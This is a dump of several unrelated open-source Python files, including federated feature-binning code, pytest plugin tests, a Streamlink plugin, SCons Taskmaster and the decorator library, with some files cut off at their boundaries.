    def __init__(self, params=None, abnormal_list=None):
        super().__init__(params, abnormal_list)
        # self.aggregator = secure_sum_aggregator.Server(enable_secure_aggregate=True)
        self.aggregator = None  # injected later via set_aggregator()
        self.transfer_variable = HomoBinningTransferVariable()
        self.suffix = None

    def set_suffix(self, suffix):
        # Round tag used in every transfer/aggregation message below.
        self.suffix = suffix

    def set_transfer_variable(self, variable):
        self.transfer_variable = variable

    def set_aggregator(self, aggregator):
        self.aggregator = aggregator

    def get_total_count(self):
        """Sum the clients' instance counts and echo the total back."""
        total_count = self.aggregator.sum_model(suffix=(self.suffix, 'total_count'))
        self.aggregator.send_aggregated_model(total_count, suffix=(self.suffix, 'total_count'))
        return total_count

    def get_missing_count(self):
        """Sum the clients' missing-value counts and broadcast the result."""
        missing_count = self.aggregator.sum_model(suffix=(self.suffix, 'missing_count'))
        self.aggregator.send_aggregated_model(missing_count, suffix=(self.suffix, 'missing_count'))
        return missing_count

    def get_min_max(self):
        """Combine per-client (max, min) lists into global per-feature
        bounds, broadcast them, and return (min_values, max_values)."""
        local_values = self.transfer_variable.local_static_values.get(suffix=(self.suffix, "min-max"))
        max_array, min_array = [], []
        for local_max, local_min in local_values:
            max_array.append(local_max)
            min_array.append(local_min)
        max_values = np.max(max_array, axis=0)
        min_values = np.min(min_array, axis=0)
        self.transfer_variable.global_static_values.remote((max_values, min_values),
                                                           suffix=(self.suffix, "min-max"))
        return min_values, max_values

    def query_values(self):
        """Aggregate clients' rank tables and send the summed table back."""
        rank_weight = self.aggregator.aggregate_tables(suffix=(self.suffix, 'rank'))
        self.aggregator.send_aggregated_tables(rank_weight, suffix=(self.suffix, 'rank'))
class Client(BaseBinning):
    def __init__(self, params: HomoFeatureBinningParam = None, abnormal_list=None):
        super().__init__(params, abnormal_list)
        # self.aggregator = secure_sum_aggregator.Client(enable_secure_aggregate=True)
        self.aggregator = None  # injected later via set_aggregator()
        self.transfer_variable = HomoBinningTransferVariable()
        # Cached global bounds, populated on the first get_min_max() call.
        self.max_values, self.min_values = None, None
        self.suffix = None
        self.total_count = 0
    def set_suffix(self, suffix):
        # Round tag used to namespace every transfer/aggregation message.
        self.suffix = suffix

    def set_transfer_variable(self, variable):
        self.transfer_variable = variable

    def set_aggregator(self, aggregator):
        self.aggregator = aggregator
    def get_total_count(self, data_inst):
        """Contribute the local instance count to the secure sum and
        return the federation-wide total received back from the server."""
        count = data_inst.count()
        count_weight = weights.NumericWeights(count)
        self.aggregator.send_model(count_weight, suffix=(self.suffix, 'total_count'))
        total_count = self.aggregator.get_aggregated_model(suffix=(self.suffix, 'total_count')).unboxed
        return total_count
    def get_missing_count(self, summary_table):
        """Contribute per-feature missing-value counts and return the
        aggregated counts dict received back from the server."""
        missing_table = summary_table.mapValues(lambda x: x.missing_count)
        missing_value_counts = dict(missing_table.collect())
        missing_weight = weights.DictWeights(missing_value_counts)
        self.aggregator.send_model(missing_weight, suffix=(self.suffix, 'missing_count'))
        missing_counts = self.aggregator.get_aggregated_model(suffix=(self.suffix, 'missing_count')).unboxed
        return missing_counts
def get_min_max(self, data_inst):
"""
Get max and min value of each selected columns
Returns:
max_values, min_values: dict
eg. {"x1": 10, "x2": 3, ... }
"""
if self.max_values and self.min_values:
return self.max_values, self.min_values
statistic_obj = MultivariateStatisticalSummary(data_inst,
cols_index=self.bin_inner_param.bin_indexes,
abnormal_list=self.abnormal_list,
error=self.params.error)
max_values = statistic_obj.get_max()
min_values = statistic_obj.get_min()
max_list = [max_values[x] for x in self.bin_inner_param.bin_names]
min_list = [min_values[x] for x in self.bin_inner_param.bin_names]
local_min_max_values = (max_list, min_list)
self.transfer_variable.local_static_values.remote(local_min_max_values,
suffix=(self.suffix, "min-max"))
self.max_values, self.min_values = self.transfer_variable.global_static_ |
mfalesni/pytest-fauxfactory | tests/test_faux_string.py | Python | gpl-3.0 | 5,253 | 0 | # -*- coding: utf-8 -*-
"""Test the `faux_string` mark."""
import pytest
def is_numeric(value):
    """Return True if every character in *value* is numeric
    (delegates to str.isnumeric; False for an empty string)."""
    return value.isnumeric()
def contains_number(value):
    """Return True when at least one character of *value* is numeric."""
    for character in value:
        if character.isnumeric():
            return True
    return False
def test_mark_plain(testdir):
    """Check that mark `faux_string` adds 10 iterations to test."""
    # `testdir` is pytest's plugin-testing fixture: it writes a throwaway
    # test module and runs it in an isolated pytest session.
    testdir.makepyfile("""
        import pytest
        @pytest.mark.faux_string(10)
        def test_something(value):
            assert 1 == 1
    """)
    result = testdir.runpytest()
    # One pass per generated value, so 10 parametrized runs are expected.
    result.assert_outcomes(passed=10)
    assert result.ret == 0
def test_mark_correct_value(testdir):
    """Check that argument `value` is being used to pass random data."""
    testdir.makepyfile("""
        import pytest
        @pytest.mark.faux_string(10)
        def test_something(value):
            assert value
    """)
    result = testdir.runpytest()
    result.assert_outcomes(passed=10)
    assert result.ret == 0

def test_mark_incorrect_value(testdir):
    """Check that argument `value` is not being used."""
    # The generated test takes `foo` instead of `value`, so the plugin
    # must refuse to parametrize it and report a collection error.
    testdir.makepyfile("""
        import pytest
        @pytest.mark.faux_string(10)
        def test_something(foo):
            assert foo
    """)
    result = testdir.runpytest()
    result.assert_outcomes(error=1)
    assert 'uses no argument \'value\'' in result.stdout.str()
    assert result.ret == 2
def test_mark_str_type_argument(testdir):
    """Check that passing only str_type argument works."""
    testdir.makepyfile("""
        import pytest
        @pytest.mark.faux_string('alpha')
        def test_something(value):
            assert value
    """)
    result = testdir.runpytest()
    result.assert_outcomes(passed=1)
    assert result.ret == 0

def test_mark_incorrect_str_type_argument(testdir):
    """Check that passing incorrect str_type argument raises error."""
    testdir.makepyfile("""
        import pytest
        @pytest.mark.faux_string('alphabet')
        def test_something(value):
            assert value
    """)
    result = testdir.runpytest()
    result.assert_outcomes(error=1)
    assert 'String type alphabet is not supported' in result.stdout.str()
    assert result.ret == 2

def test_mark_incorrect_argument(testdir):
    """Check that first argument to mark is numeric."""
    # A non-numeric first positional is interpreted as a str_type, so the
    # plugin rejects the string '1' as an unsupported type.
    testdir.makepyfile("""
        import pytest
        @pytest.mark.faux_string('1')
        def test_something(value):
            assert value
    """)
    result = testdir.runpytest()
    result.assert_outcomes(error=1)
    assert 'String type 1 is not supported' in result.stdout.str()
    assert result.ret == 2
def test_mark_invalid_integer(testdir):
    """Check that first argument to mark is valid integer."""
    # Zero iterations is meaningless, so the plugin must error out.
    testdir.makepyfile("""
        import pytest
        @pytest.mark.faux_string(0)
        def test_something(value):
            assert value
    """)
    result = testdir.runpytest()
    result.assert_outcomes(error=1)
    assert 'Mark expected an integer greater than 0' in result.stdout.str()
    assert result.ret == 2
# The remaining tests exercise the mark directly: each decorated test is
# parametrized by the plugin with generated string values.

@pytest.mark.faux_string()
def test_gen_alpha_string_with_no_arguments(value):
    """Passing no arguments should return a random string type."""
    assert len(value) > 0

@pytest.mark.faux_string(1)
def test_gen_alpha_string_with_limit_arguments(value):
    """Passing limit argument should return a random string type."""
    assert len(value) > 0

@pytest.mark.faux_string(4, 'alpha', length=12)
def test_gen_alpha_string_with_length(value):
    """Generate an `alpha` string of length 12."""
    assert len(value) == 12

@pytest.mark.faux_string(
    1,
    'punctuation',
    length=12,
    validator=is_numeric,
    default='1')
def test_gen_alpha_string_with_validator(value):
    """Call `faux_string` with validator that returns default of `1`."""
    # Punctuation can never satisfy is_numeric, so the default is used.
    assert value == '1'

@pytest.mark.faux_string(4, 'alpha', length=[5, 15])
def test_gen_alpha_string_with_variable_length(value):
    """Generate an `alpha` string of length of either 5 or 15."""
    assert len(value) == 5 or len(value) == 15

@pytest.mark.faux_string(4, [], length=[5, 30])
def test_gen_alpha_string_with_empty_types(value):
    """Generate default alpha strings with length 5 and 30 characters."""
    assert len(value) >= 5

@pytest.mark.faux_string(4, ['alpha', 'alphanumeric'], length=[])
def test_gen_alpha_string_with_empty_length(value):
    """Generate default alpha strings with length as empty list."""
    assert len(value) == 10

@pytest.mark.faux_string(4, [], length=[])
def test_gen_alpha_string_with_empty_types_and_length(value):
    """Generate default alpha strings with types and length as empty lists."""
    assert len(value) >= 10

@pytest.mark.faux_string(4, ['alpha', 'numeric'], length=[5, 30])
def test_gen_alpha_string_with_variable_types(value):
    """Generate alpha strings with length 5, alphanumeric with length 30."""
    # Lengths and types are zipped: length-5 values are pure alpha,
    # length-30 values are numeric.
    if len(value) == 5:
        assert not contains_number(value)
    else:
        assert contains_number(value)

@pytest.mark.faux_string(2, 'alpha', argnames='name')
def test_gen_alpha_string_with_custom_arg_name(name):
    """Generate default alpha strings with custom argument."""
    assert len(name) == 10
chhe/streamlink | src/streamlink/plugins/raiplay.py | Python | bsd-2-clause | 1,786 | 0.00168 | """
$url raiplay.it
$type live
$region Italy
"""
import logging
import re
f | rom urllib.parse import urlparse, urlunparse
from streamlink.plugin import Plugin, pluginmatcher
from streamlink.plugin.api import validate
from streamlink.stream.hls import HLSStream
log = logging.getLogger(__name__)
class RaiPlayHLSStream(HLSStream):
    """HLS stream variant that forces UTF-8 on the playlist response.

    Rai serves its playlists without a charset declaration, so decode
    explicitly before handing off to the regular HLS parser.
    """
    @classmethod
    def _get_variant_playlist(cls, res):
        res.encoding = "UTF-8"
        return super()._get_variant_playlist(res)
@pluginmatcher(re.compile(
    r"https?://(?:www\.)?raiplay\.it/dirette/(\w+)/?"
))
class RaiPlay(Plugin):
    """Streamlink plugin for Rai live channels on raiplay.it."""

    # data-video-json on the channel page holds the relative path of the
    # per-channel JSON document.
    _re_data = re.compile(r"data-video-json\s*=\s*\"([^\"]+)\"")
    _schema_data = validate.Schema(
        validate.transform(_re_data.search),
        validate.any(None, validate.get(1))
    )
    # That JSON document exposes the stream URL under video.content_url.
    _schema_json = validate.Schema(
        validate.parse_json(),
        validate.get("video"),
        validate.get("content_url"),
        validate.url()
    )

    def _get_streams(self):
        json_url = self.session.http.get(self.url, schema=self._schema_data)
        if not json_url:
            return
        # The extracted path is relative; resolve it against the page URL.
        json_url = urlunparse(urlparse(self.url)._replace(path=json_url))
        log.debug("Found JSON URL: {0}".format(json_url))
        stream_url = self.session.http.get(json_url, schema=self._schema_json)
        log.debug("Found stream URL: {0}".format(stream_url))
        res = self.session.http.request("HEAD", stream_url)
        # status code will be 200 even if geo-blocked, so check the returned content-type
        if not res or not res.headers or res.headers["Content-Type"] == "video/mp4":
            log.error("Geo-restricted content")
            return
        yield from RaiPlayHLSStream.parse_variant_playlist(self.session, stream_url).items()
__plugin__ = RaiPlay
|
frappe/erpnext | erpnext/education/doctype/course_topic/test_course_topic.py | Python | gpl-3.0 | 154 | 0.006494 | # Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and | Contributors
# See license.txt
import unittest
class Tes | tCourseTopic(unittest.TestCase):
pass
|
afourmy/pyNMS | pyNMS/right_click_menus/network_general_menu.py | Python | gpl-3.0 | 1,562 | 0.007042 | # Copyright (C) 2017 Antoine Fourmy <antoine dot fourmy at gmail dot com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the i | mplied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Ge | neral Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from .general_menu import GeneralMenu
from .geographical_menu import GeographicalMenu
from miscellaneous.decorators import overrider
from PyQt5.QtWidgets import QMenu, QAction
class NetworkGeneralMenu(GeneralMenu, GeographicalMenu):
    """Background right-click menu of a network view: exposes the refresh,
    graph-drawing and map actions inherited from the two parent menus."""

    def __init__(self, event, controller):
        super().__init__(event, controller)
        # find networks
        refresh = QAction('Refresh', self)
        refresh.triggered.connect(self.refresh)
        self.addAction(refresh)
        self.addSeparator()
        self.addAction(self.drawing_action)
        self.addSeparator()
        self.addAction(self.map_action)

    @overrider(GeneralMenu)
    def graph_drawing(self, drawing):
        # Pure delegation; @overrider presumably only asserts that
        # GeneralMenu defines graph_drawing — confirm in
        # miscellaneous.decorators before removing this override.
        super().graph_drawing(drawing)

    def remove_all_failures(self):
        self.view.remove_failures()

    def refresh(self):
        self.project.refresh()
tencent-wechat/phxsql | phxrpc_package_config/tools/phxsql_utils.py | Python | gpl-2.0 | 103 | 0.106796 | d | ef format_path( str ):
while( str.find( '//' ) != -1 ):
str = str.replace( '//', '/' )
ret | urn str
|
ict-felix/stack | vt_manager_kvm/src/python/vt_manager_kvm/communication/sfa/setUp/setup_config.py | Python | apache-2.0 | 416 | 0.036058 | AUTHORITY_XRN = 'ocf.ofam'
SUBJ | ECT = {'CN':'OfeliaSDKR1',
'C':'SP',
'ST':'Catalunya',
'L':'Barcelona',
'O':'i2CAT',
'OU':'DANA',
}
PARENT_SUBJECT = {'CN':'OfeliaSDKR1',
'C':'SP',
'ST':'Catalunya',
'L':'Barcelona',
'O':'i2CAT',
'OU':'DANA',
}
| |
stonekyx/binary | vendor/scons-local-2.3.4/SCons/Taskmaster.py | Python | gpl-3.0 | 40,520 | 0.002098 | #
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__doc__ = """
Generic Taskmaster module for the SCons build engine.
This module contains the primary interface(s) between a wrapping user
interface and the SCons build engine. There are two key classes here:
Taskmaster
This is the main engine for walking the dependency graph and
calling things to decide what does or doesn't need to be built.
Task
This is the base class for allowing a wrapping interface to
decide what does or doesn't actually need to be done. The
intention is for a wrapping interface to subclass this as
appropriate for different types of behavior it may need.
The canonical example is the SCons native Python interface,
which has Task subclasses that handle its specific behavior,
like printing "`foo' is up to date" when a top-level target
doesn't need to be built, and handling the -c option by removing
targets as its "build" action. There is also a separate subclass
for suppressing this output when the -q option is used.
The Taskmaster instantiates a Task object for each (set of)
target(s) that it decides need to be evaluated and/or built.
"""
__revision__ = "src/engine/SCons/Taskmaster.py 2014/09/27 12:51:43 garyo"
from itertools import chain
import operator
import sys
import traceback
import SCons.Errors
import SCons.Node
import SCons.Warnings
StateString = SCons.Node.StateString
NODE_NO_STATE = SCons.Node.no_state
NODE_PENDING = SCons.Node.pending
NODE_EXECUTING = SCons.Node.executing
NODE_UP_TO_DATE = SCons.Node.up_to_date
NODE_EXECUTED = SCons.Node.executed
NODE_FAILED = SCons.Node.failed
print_prepare = 0 # set by option --debug=prepare
# A subsystem for recording stats about how different Nodes are handled by
# the main Taskmaster loop. There's no external control here (no need for
# a --debug= option); enable it by changing the value of CollectStats.
CollectStats = None
class Stats(object):
    """
    A simple record of how the Taskmaster disposed of one Node.

    When statistics collection is enabled, each Node processed by the
    Taskmaster gets one of these attached, and the Taskmaster bumps the
    matching counter every time it handles the Node (ideally just once).
    """
    # Counter names, in the order the report format expects them.
    def __init__(self):
        """
        Initialize every disposition counter to zero.
        """
        for counter in ('considered', 'already_handled', 'problem',
                        'child_failed', 'not_built', 'side_effects',
                        'build'):
            setattr(self, counter, 0)
# All Nodes that had a Stats instance attached (see CollectStats above).
StatsNodes = []

# One right-aligned column per Stats counter, in declaration order.
fmt = "%(considered)3d "\
      "%(already_handled)3d " \
      "%(problem)3d " \
      "%(child_failed)3d " \
      "%(not_built)3d " \
      "%(side_effects)3d " \
      "%(build)3d "

def dump_stats():
    """Print one formatted stats line per collected Node, sorted by name."""
    for n in sorted(StatsNodes, key=str):
        # Parenthesize the whole argument so this is a valid print *call*
        # on both Python 2 and 3: the old `print (x) + str(n)` statement
        # form raises TypeError under Python 3.
        print(fmt % n.stats.__dict__ + str(n))
class Task(object):
"""
Default SCons build engine task.
This controls the interaction of the actual building of node
and the rest of the engine.
This is expected to handle all of the normally-customizable
aspects of controlling a build, so any given application
*should* be able to do what it wants by sub-classing this
class and overriding methods as appropriate. If an application
needs to customze something by sub-classing Taskmaster (or
some other build engine class), we should first try to migrate
that functionality into this class.
Note that it's generally a good idea for sub-classes to call
these methods explicitly to update state, etc., rather than
roll their own interaction with Taskmaster from scratch.
"""
def __init__(self, tm, targets, top, node):
self.tm | = tm
self.targets = targets
self.top = top
self.node = node
self.exc_clear()
def trace_message(self, method, node, description='node'):
fmt = '%-20s %s % | s\n'
return fmt % (method + ':', description, self.tm.trace_node(node))
    def display(self, message):
        """
        Hook to allow the calling interface to display a message.

        This hook gets called as part of preparing a task for execution
        (that is, a Node to be built). As part of figuring out what Node
        should be built next, the actual target list may be altered,
        along with a message describing the alteration. The calling
        interface can subclass Task and provide a concrete implementation
        of this method to see those messages.
        """
        # Intentionally a no-op in the base class.
        pass
    def prepare(self):
        """
        Called just before the task is executed.

        This is mainly intended to give the target Nodes a chance to
        unlink underlying files and make all necessary directories before
        the Action is actually called to build the targets.

        NOTE: this module targets Python 2 — the `print` statements below
        are deliberate.
        """
        global print_prepare
        T = self.tm.trace
        if T: T.write(self.trace_message(u'Task.prepare()', self.node))
        # Now that it's the appropriate time, give the TaskMaster a
        # chance to raise any exceptions it encountered while preparing
        # this task.
        self.exception_raise()
        if self.tm.message:
            self.display(self.tm.message)
            self.tm.message = None
        # Let the targets take care of any necessary preparations.
        # This includes verifying that all of the necessary sources
        # and dependencies exist, removing the target file(s), etc.
        #
        # As of April 2008, the get_executor().prepare() method makes
        # sure that all of the aggregate sources necessary to build this
        # Task's target(s) exist in one up-front check.  The individual
        # target t.prepare() methods check that each target's explicit
        # or implicit dependencies exists, and also initialize the
        # .sconsign info.
        executor = self.targets[0].get_executor()
        if executor is None:
            return
        executor.prepare()
        for t in executor.get_action_targets():
            if print_prepare:
                print "Preparing target %s..."%t
                for s in t.side_effects:
                    print "...with side-effect %s..."%s
            t.prepare()
            for s in t.side_effects:
                if print_prepare:
                    print "...Preparing side-effect %s..."%s
                s.prepare()
    def get_target(self):
        """Fetch the target being built or updated by this task.

        Returns the Node whose evaluation created this task.
        """
        return self.node
def needs_execute(self):
# TODO(deprecate): "return True" is the old default behavior;
# change it to NotImplementedError (after running through the
# Deprecation Cycle) so the desired behavior is explicitly
# determined by which concrete subclass is used.
#raise NotImplementedError
msg = ('Taskmaster.Task is an abstract base class; i |
Bolton-and-Menk-GIS/restapi | restapi/decorator/__init__.py | Python | gpl-2.0 | 16,306 | 0.000736 | # ######################### LICENSE ############################ #
# Copyright (c) 2005-2015, Michele Simionato
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in bytecode form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDERS OR CONTRIBUTORS BE | LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREME | NT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
"""
Decorator module, see http://pypi.python.org/pypi/decorator
for the documentation.
"""
from __future__ import print_function
__version__ = '4.0.2'
import re
import sys
import inspect
import operator
import itertools
import collections
# Python 2/3 compatibility shims: expose getfullargspec, getargspec and
# get_init with a uniform interface on both major versions.
# NOTE(review): the string comparison of sys.version is fragile in
# general, but behaves correctly for the 2.x/3.x split targeted here.
if sys.version >= '3':
    from inspect import getfullargspec

    def get_init(cls):
        return cls.__init__
else:
    class getfullargspec(object):
        "A quick and dirty replacement for getfullargspec for Python 2.X"
        def __init__(self, f):
            self.args, self.varargs, self.varkw, self.defaults = \
                inspect.getargspec(f)
            self.kwonlyargs = []
            self.kwonlydefaults = None

        def __iter__(self):
            # Allows tuple-unpacking, like the real argspec.
            yield self.args
            yield self.varargs
            yield self.varkw
            yield self.defaults

    getargspec = inspect.getargspec

    def get_init(cls):
        # Unwrap the unbound method object that Python 2 returns.
        return cls.__init__.__func__
# getargspec has been deprecated in Python 3.5
ArgSpec = collections.namedtuple(
'ArgSpec', 'args varargs varkw defaults')
def getargspec(f):
"""A replacement for inspect.getargspec"""
spec = getfullargspec(f)
return ArgSpec(spec.args, spec.varargs, spec.varkw, spec.defaults)
DEF = re.compile('\s*def\s*([_\w][_\w\d]*)\s*\(')
# basic functionality
class FunctionMaker(object):
"""
An object with the ability to create functions with a given signature.
It has attributes name, doc, module, signature, defaults, dict and
methods update and make.
"""
    def __init__(self, func=None, name=None, signature=None,
                 defaults=None, doc=None, module=None, funcdict=None):
        """Capture name/signature/doc/module metadata from *func*, then
        let the explicit keyword arguments override any of them.
        Raises TypeError if no usable signature can be determined."""
        self.shortsignature = signature
        if func:
            # func can be a class or a callable, but not an instance method
            self.name = func.__name__
            if self.name == '<lambda>':  # small hack for lambda functions
                self.name = '_lambda_'
            self.doc = func.__doc__
            self.module = func.__module__
            if inspect.isfunction(func):
                argspec = getfullargspec(func)
                self.annotations = getattr(func, '__annotations__', {})
                for a in ('args', 'varargs', 'varkw', 'defaults', 'kwonlyargs',
                          'kwonlydefaults'):
                    setattr(self, a, getattr(argspec, a))
                # Also expose positional args as arg0, arg1, ... for use
                # inside generated source templates.
                for i, arg in enumerate(self.args):
                    setattr(self, 'arg%d' % i, arg)
                if sys.version < '3':  # easy way
                    self.shortsignature = self.signature = (
                        inspect.formatargspec(
                            formatvalue=lambda val: "", *argspec)[1:-1])
                else:  # Python 3 way
                    # `signature` keeps placeholders (e.g. kw-only '=None')
                    # for the generated def; `shortsignature` is how the
                    # wrapper forwards the same arguments in a call.
                    allargs = list(self.args)
                    allshortargs = list(self.args)
                    if self.varargs:
                        allargs.append('*' + self.varargs)
                        allshortargs.append('*' + self.varargs)
                    elif self.kwonlyargs:
                        allargs.append('*')  # single star syntax
                    for a in self.kwonlyargs:
                        allargs.append('%s=None' % a)
                        allshortargs.append('%s=%s' % (a, a))
                    if self.varkw:
                        allargs.append('**' + self.varkw)
                        allshortargs.append('**' + self.varkw)
                    self.signature = ', '.join(allargs)
                    self.shortsignature = ', '.join(allshortargs)
                self.dict = func.__dict__.copy()
        # func=None happens when decorating a caller
        if name:
            self.name = name
        if signature is not None:
            self.signature = signature
        if defaults:
            self.defaults = defaults
        if doc:
            self.doc = doc
        if module:
            self.module = module
        if funcdict:
            self.dict = funcdict
        # check existence required attributes
        assert hasattr(self, 'name')
        if not hasattr(self, 'signature'):
            raise TypeError('You are decorating a non function: %s' % func)
    def update(self, func, **kw):
        "Update the signature of func with the data in self"
        # Copy the recorded metadata onto the freshly generated function.
        func.__name__ = self.name
        func.__doc__ = getattr(self, 'doc', None)
        func.__dict__ = getattr(self, 'dict', {})
        func.__defaults__ = getattr(self, 'defaults', ())
        func.__kwdefaults__ = getattr(self, 'kwonlydefaults', None)
        func.__annotations__ = getattr(self, 'annotations', None)
        try:
            # Frame 3 is the caller of the public decorator API; its module
            # name is used when self has no explicit module recorded.
            frame = sys._getframe(3)
        except AttributeError: # for IronPython and similar implementations
            callermodule = '?'
        else:
            callermodule = frame.f_globals.get('__name__', '?')
        func.__module__ = getattr(self, 'module', callermodule)
        # Extra keyword attributes (e.g. __wrapped__, __source__) win last.
        func.__dict__.update(kw)
    def make(self, src_templ, evaldict=None, addsource=False, **attrs):
        "Make a new function from a given template and update the signature"
        src = src_templ % vars(self) # expand name and signature
        evaldict = evaldict or {}
        mo = DEF.match(src)
        if mo is None:
            raise SyntaxError('not a valid function template\n%s' % src)
        name = mo.group(1) # extract the function name
        # Guard against templates shadowing the reserved helper names that
        # the decorator machinery injects into evaldict.
        names = set([name] + [arg.strip(' *') for arg in
                              self.shortsignature.split(',')])
        for n in names:
            if n in ('_func_', '_call_'):
                raise NameError('%s is overridden in\n%s' % (n, src))
        if not src.endswith('\n'): # add a newline just for safety
            src += '\n' # this is needed in old versions of Python
        try:
            # 'single' mode: the source is exactly one def statement, which
            # binds the new function into evaldict when exec'd.
            code = compile(src, '<string>', 'single')
            exec(code, evaldict)
        except:
            # Bare except is deliberate: dump the offending source to aid
            # debugging, then re-raise the original exception unchanged.
            print('Error in generated code:', file=sys.stderr)
            print(src, file=sys.stderr)
            raise
        func = evaldict[name]
        if addsource:
            attrs['__source__'] = src
        self.update(func, **attrs)
        return func
@classmethod
def create(cls, obj, body, evaldict, defaults=None,
doc=None, module=None, addsource=True, **attrs):
"""
Create a function from the strings name, signature and body.
evaldict is the evaluation dictionary. If addsource is true an
attribute __source__ is added to the result. The attributes attrs
are added, if any.
"""
if isinstanc |
brianr/uuss | proto.py | Python | mit | 17,229 | 0.003541 | import contextlib
from uuss.server import model
from lolapps.common import uums
from lolapps.util import json
import os
import simplejson
import struct
import time
try:
# Try importing the C++ extension version
import uuss_pb
except:
# The dynamic python version will automatically be used
pass
from uuss.uuss_pb2 import *
from uuss.server import model
from lolapps.common import uums
from lolapps.util.adapters import chunking
from lolapps.util import lolsocket
import logging
log = logging.getLogger(__name__)
class UUSSProtocolException(Exception):
    """Base error for violations of the UUSS wire protocol."""
    pass
class UUSSShardDownException(UUSSProtocolException):
    """Raised when the shard serving the requested userstate is unavailable."""
    pass
class UUSSFailHealthcheckException(UUSSProtocolException):
    """Raised to make the server report itself unhealthy to healthchecks."""
    pass
class UUSSAction(object):
    """
    Base class for UUSS actions.
    Note: the get_response and _call methods are set as @contextlib.contextmanager
    in order for a get-with-lock to be able to use the with userstate.open mechanism
    to ensure that the lock is released at the appropriate time.
    """
    def __init__(self):
        # Subclasses bind these to the concrete protobuf request/response
        # classes they handle (e.g. GetRequest/GetResponse).
        self.Request = None
        self.Response = None
    @contextlib.contextmanager
    def get_response(self, protocol, req, config):
        """Yield the response for *req*, dispatching to the subclass _call.

        The game-specific userstate module is looked up dynamically from
        model by req.game.  Sanity-asserts that the response echoes the
        request's user_id and game before yielding it.
        """
        log.debug("UUSSAction.get_response start (%r, %r)", req.user_id, req.game)
        userstate = getattr(model, req.game).userstate
        log.debug("UUSSAction.get_response userstate: %r", userstate)
        with self._call(protocol, userstate, req, config) as resp:
            assert req.user_id == resp.user_id
            assert req.game == resp.game
            log.debug("UUSSAction.get_response pre-yield (%r, %r)", req.user_id, req.game)
            yield resp
            log.debug("UUSSAction.get_response post-yield (%r, %r)", req.user_id, req.game)
        log.debug("UUSSAction.get_response end (%r, %r)", req.user_id, req.game)
    @contextlib.contextmanager
    def _call(self, protocol, userstate, req, config):
        # Abstract: subclasses must yield exactly one response object.
        raise Exception('Implement me!')
## UUSS (UserState) Protocol ##
class Get(UUSSAction):
    """Fetch a userstate, optionally holding its lock until ReleaseLock."""
    def __init__(self):
        self.Request = GetRequest
        self.Response = GetResponse
    @contextlib.contextmanager
    def _call(self, protocol, userstate, req, config):
        """Yield a GetResponse carrying the (chunked) state for req.user_id.

        When req.lock is set, the userstate lock stays held for the whole
        'with' body and is only dropped after a matching ReleaseLock message
        arrives (see _wait_for_release_lock).
        """
        log.debug("Get._call start (%r, %r)", req.user_id, req.game)
        if req.lock:
            # If a lock is requested we need to keep control within this 'with' block
            # until we receive a ReleaseLock message but we also need to "return"
            # the userstate requested. This is why this method and UUSSAction.get_response
            # are contextmanagers. 'yield' allows us to return the value without
            # leaving the 'with' block.
            with userstate.open(
                req.user_id,
                create_if_missing=req.create_if_missing,
                lock_timeout=req.lock_timeout,
                max_wait=req.lock_max_wait,
                label=req.lock_label,
                raw=True
                ) as (state, chunked):
                log.debug("Get._call pre-yield (%r, %r)", req.user_id, req.game)
                yield self._build_response(state, chunked, req.game, req.user_id)
                log.debug("Get._call post-yield (%r, %r)", req.user_id, req.game)
                # we require a ReleaseLock message before we can leave this context and release the lock
                self._wait_for_release_lock(protocol, req, config)
        else:
            (state, chunked) = userstate.get(req.user_id, req.create_if_missing, raw=True)
            log.debug("Get._call pre-yield (%r, %r)", req.user_id, req.game)
            yield self._build_response(state, chunked, req.game, req.user_id)
            log.debug("Get._call post-yield (%r, %r)", req.user_id, req.game)
        log.debug("Get._call end (%r, %r)", req.user_id, req.game)
    def _wait_for_release_lock(self, protocol, get_req, config):
        """
        Same as the normal server loop except that we will break once we get and process a ReleaseLock message.
        @see server.connection.ConnectionHandler.run
